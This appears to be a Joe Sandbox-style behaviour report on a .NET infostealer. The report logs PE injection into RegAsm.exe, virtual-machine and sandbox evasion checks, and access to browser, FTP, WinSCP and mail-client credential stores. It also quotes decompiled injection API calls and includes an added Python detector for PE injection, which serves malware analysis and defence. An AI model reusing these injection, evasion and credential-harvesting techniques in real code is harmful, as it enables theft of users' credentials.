Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Mutant created: NULL
Source: 450230549.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: 450230549.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File read: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\450230549.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: 450230549.exe | ReversingLabs: Detection: 34%
Source: unknown | Process created: C:\Users\user\Desktop\450230549.exe "C:\Users\user\Desktop\450230549.exe"
Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: profapi.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: cryptsp.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: rsaenh.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: cryptbase.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: rasapi32.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: rasman.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: rtutils.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: mswsock.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: winhttp.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: iphlpapi.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: dnsapi.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: winnsi.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: rasadhlp.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: secur32.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: sspicli.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: schannel.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: ntasn1.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: ncrypt.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: msasn1.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Section loaded: gpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mscoree.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: apphelp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: aclayers.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mpr.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sfc_os.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: kernel.appcore.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: version.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vcruntime140_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ucrtbase_clr0400.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: uxtheme.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: windows.storage.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wldp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: profapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptsp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rsaenh.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: cryptbase.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wbemcomn.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: amsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: userenv.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: sspicli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasapi32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasman.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rtutils.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mswsock.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winhttp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ondemandconnroutehelper.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: iphlpapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc6.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dhcpcsvc.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: dnsapi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: winnsi.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: rasadhlp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: fwpuclnt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: vaultcli.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: wintypes.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: secur32.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: schannel.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: mskeyprotect.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ntasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncrypt.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: ncryptsslp.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: msasn1.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Section loaded: edputil.dll
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{CF4CC405-E2C5-4DDD-B3CE-5E7582D8C9FA}\InprocServer32
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\11.0\Outlook\Profiles
                    Source: 450230549.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                    Source: 450230549.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                    Source: 450230549.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
                    Source: Binary string: HSDSDF32.pdb( source: 450230549.exe
                    Source: Binary string: HSDSDF32.pdb source: 450230549.exe

                    Data Obfuscation

                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.cs | .Net Code: Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777255)).GetMethod("GetDelegateForFunctionPointer", new Type[2]{Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777256)),Type.GetTypeFromHandle(KKr6hZkjvwWjdm9A4Z.IRRpZ0UGCKAgx(16777253))})
                    Source: 450230549.exe | Static PE information: 0xA449B1F0 [Sat May 5 12:58:24 2057 UTC]
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EAAEB8 push esp; iretd 3_2_00EAB1FD
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_060F9672 push es; ret 3_2_060F968C
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_060F7782 push es; ret 3_2_060F7790
                    Source: 450230549.exe, DyyVDbaRvM1YfIq9il.cs | High entropy of concatenated method names: 'D4r4O0AxSI', 'OadpZ0AU6PEEW', 'creoiNvd7', 'jZiU8kt7k', 'yIEeUuogE', 'HNMMnrD0K', 'U6ZIpjiMV', 'TYIaeXNeW', 'rI3lmZ9FL', 'SuhhReBcy'
                    Source: 450230549.exe, R2mIapWar4cwoqqx6Q.cs | High entropy of concatenated method names: 'IWZ4FNxMCV', 'X4o4BaXNNW', 'ReR4PkWY9i', 'XZO4yOqtpA', 'pcT48wm9UY', 'Y9l4jroko9', 'OY84tBcMwd', 'JrQ4qkE5mX', 'iRM4R10ean', 'AGe45CEX5X'

                    Hooking and other Techniques for Hiding and Protection

                    Source: initial sample | Icon embedded in binary file: icon matches a legit application icon: download (92).png
                    Source: C:\Users\user\Desktop\450230549.exe | Process information set: NOOPENFILEERRORBOX (this identical entry appears 45 times in the report)
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process information set: NOOPENFILEERRORBOX (this identical entry appears 63 times in the report)

                    Malware Analysis System Evasion

                    Source: Yara match | File source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
                    Source: global traffic | HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1; Host: ip-api.com; Connection: Keep-Alive
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT * FROM Win32_VideoController
                    Source: 450230549.exe, 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: SBIEDLL.DLL
                    Source: C:\Users\user\Desktop\450230549.exe | Memory allocated: D30000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\450230549.exe | Memory allocated: 2700000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\450230549.exe | Memory allocated: 4700000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: EA0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 28A0000 memory reserve | memory write watch
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 26A0000 memory reserve | memory write watch
                    Source: C:\Users\user\Desktop\450230549.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 5903375
                    Source: C:\Users\user\Desktop\450230549.exe TID: 6220 | Thread sleep count: 188 > 30
                    Source: C:\Users\user\Desktop\450230549.exe TID: 6220 | Thread sleep count: 286 > 30
                    Source: C:\Users\user\Desktop\450230549.exe TID: 7116 | Thread sleep time: -922337203685477s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348 | Thread sleep time: -1844674407370954s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348 | Thread sleep time: -100000s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 5868 | Thread sleep count: 200 > 30
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe TID: 4348 | Thread sleep time: -5903375s >= -30000s
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_BaseBoard
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
                    Source: C:\Users\user\Desktop\450230549.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 922337203685477
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 100000
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Thread delayed: delay time: 5903375
                    Source: RegAsm.exe, 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp | Binary or memory string: VMware
                    Source: RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: vmware
                    Source: RegAsm.exe, 00000003.00000002.3561320384.0000000005AF0000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllS
                    Source: RegAsm.exe, 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp | Binary or memory string: VMwareVBoxESelect * from Win32_ComputerSystem
                    Source: 450230549.exe, 00000000.00000002.1722663773.0000000000A47000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                    Source: C:\Users\user\Desktop\450230549.exe | Process information queried: ProcessInformation

                    Anti Debugging

                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 3_2_00EA71D0 CheckRemoteDebuggerPresent,3_2_00EA71D0
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process queried: DebugPort
                    Source: C:\Users\user\Desktop\450230549.exe | Process token adjusted: Debug
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Process token adjusted: Debug
                    Source: C:\Users\user\Desktop\450230549.exe | Memory allocated: page read and write | page guard

                    HIPS / PFW / Operating System Protection Evasion

                    Source: 450230549.exe, Program.cs | Reference to suspicious API methods: App.ReadProcessMemory(Settings.pi.ProcessHandle, num3 + 8, ref buffer, 4, ref bytesRead)
                    Source: 450230549.exe, Program.cs | Reference to suspicious API methods: App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)
                    Source: 450230549.exe, Program.cs | Reference to suspicious API methods: App.WriteProcessMemory(Settings.pi.ProcessHandle, num4, payload, bufferSize, ref bytesRead)
                    Source: 0.2.450230549.exe.385caa0.1.raw.unpack, G0uwH3C1Dp.cs | Reference to suspicious API methods: Yb0w.OpenProcess(bTplrq.DuplicateHandle, bInheritHandle: true, (uint)qDR7wr.ProcessID)
                    Source: C:\Users\user\Desktop\450230549.exe | Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 protect: page execute and read and write
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000 value starts with: 4D5A
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 400000
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 402000
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 43E000
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 440000
                    Source: C:\Users\user\Desktop\450230549.exe | Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe base: 6FC008
                    Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Users\user\Desktop\450230549.exe | Queries volume information: C:\Users\user\Desktop\450230549.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                    Source: C:\Users\user\Desktop\450230549.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
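The events above are the raw material behind the report's "Allocates memory in foreign processes", "Writes to foreign memory regions" and "Injects a PE file into a foreign processes" verdicts. The following is an added example written for this page (not code from the report or from the sample) that re-creates that reasoning in plain Python over events transcribed from the lines above, and decodes the two numeric arguments of the decompiled VirtualAllocEx call (12288 and 64) into their Windows constant names. The event schema, the default 32-bit image base of 0x400000 and the path-based "living-off-the-land host" check are assumptions of the example.

```python
"""
Process-injection triage over sandbox behaviour events (added example).

Not code from the Joe Sandbox report or the analysed sample: it re-creates the
report's foreign-memory / PE-injection verdicts from events transcribed above.
"""
from dataclasses import dataclass

# Windows memory constants (winnt.h) needed to read the decompiled call
# App.VirtualAllocEx(handle, addr, length, 12288, 64) quoted in the report.
MEM_FLAGS = {0x1000: "MEM_COMMIT", 0x2000: "MEM_RESERVE"}
PAGE_PROTECT = {0x02: "PAGE_READONLY", 0x04: "PAGE_READWRITE",
                0x20: "PAGE_EXECUTE_READ", 0x40: "PAGE_EXECUTE_READWRITE"}


def decode_virtualallocex(call):
    """Name the flAllocationType and flProtect arguments of a VirtualAllocEx call."""
    inner = call[call.index("(") + 1:call.rindex(")")]
    args = [a.strip() for a in inner.split(",")]
    alloc, protect = int(args[3]), int(args[4])
    return {
        "allocation": [name for bit, name in MEM_FLAGS.items() if alloc & bit],
        "protect": PAGE_PROTECT.get(protect, hex(protect)),
        "rwx": protect == 0x40,
    }


@dataclass(frozen=True)
class Event:
    source: str            # process performing the action
    action: str            # process_created | memory_allocated | memory_written
    target: str            # process acted upon
    base: int = 0          # address in the target, for memory events
    protect: str = ""      # protection string as the sandbox reports it
    first_bytes: str = ""  # hex of the first bytes written, when recorded


INJECTOR = r"C:\Users\user\Desktop\450230549.exe"
HOST = r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"

# Constructed input: transcribed from the behaviour lines above.
EVENTS = [
    Event(INJECTOR, "process_created", HOST),
    Event(INJECTOR, "memory_allocated", HOST, 0x400000, "page execute and read and write"),
    Event(INJECTOR, "memory_written", HOST, 0x400000, first_bytes="4D5A"),
    Event(INJECTOR, "memory_written", HOST, 0x400000),
    Event(INJECTOR, "memory_written", HOST, 0x402000),
    Event(INJECTOR, "memory_written", HOST, 0x43E000),
    Event(INJECTOR, "memory_written", HOST, 0x440000),
    Event(INJECTOR, "memory_written", HOST, 0x6FC008),
]

DEFAULT_IMAGE_BASE_X86 = 0x400000  # usual /BASE of 32-bit PE executables (assumption)
DOTNET_HOST_DIR = r"c:\windows\microsoft.net\framework"  # .NET Framework utility directory


@dataclass
class Finding:
    injector: str
    target: str
    image_base: int
    technique: str
    rwx_allocation: bool
    writes: int
    lolbin_host: bool


def detect_pe_injection(events):
    """Flag a PE header ('MZ') written into another process's address space."""
    created = {(e.source, e.target) for e in events if e.action == "process_created"}
    rwx = {(e.source, e.target, e.base) for e in events
           if e.action == "memory_allocated" and e.source != e.target
           and "execute" in e.protect and "write" in e.protect}
    findings = []
    for e in events:
        if e.action != "memory_written" or e.source == e.target:
            continue
        if not e.first_bytes.upper().startswith("4D5A"):  # DOS header magic 'MZ'
            continue
        writes = sum(1 for w in events if w.action == "memory_written"
                     and (w.source, w.target) == (e.source, e.target))
        if (e.source, e.target) in created and e.base == DEFAULT_IMAGE_BASE_X86:
            technique = ("PE written at the default image base of a child the injector "
                         "created (consistent with process hollowing)")
        else:
            technique = "remote PE injection"
        findings.append(Finding(e.source, e.target, e.base, technique,
                                (e.source, e.target, e.base) in rwx, writes,
                                e.target.lower().startswith(DOTNET_HOST_DIR)))
    return findings


if __name__ == "__main__":
    print(decode_virtualallocex(
        "App.VirtualAllocEx(Settings.pi.ProcessHandle, num2, length, 12288, 64)"))
    for finding in detect_pe_injection(EVENTS):
        print(finding)
```

The decoded call allocates committed, reserved, execute-read-write memory in the child, and the first write at 0x400000 begins with 4D5A: the injector places a whole PE image at the address where a 32-bit executable is normally mapped. Because the target is a .NET Framework utility, every later network connection and credential-store access in this report is attributed to RegAsm.exe rather than to the dropped sample, which is why the chain in the behaviour graph starts from RegAsm.exe.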

                    Stealing of Sensitive Information

Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.3820c80.2.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000003.00000002.3558791115.0000000002925000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3558791115.0000000002902000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3558791115.00000000028D5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000003.00000002.3557540735.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.1726211238.0000000003709000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: 450230549.exe PID: 7068, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 4136, type: MEMORYSTR
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match | File source: 0.2.450230549.exe.385caa0.1.unpack, type: UNPACKEDPE
Source: Yara match | File source: 3.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.450230549.exe.37e4e58.0.unpack, type: UNPACKEDPE
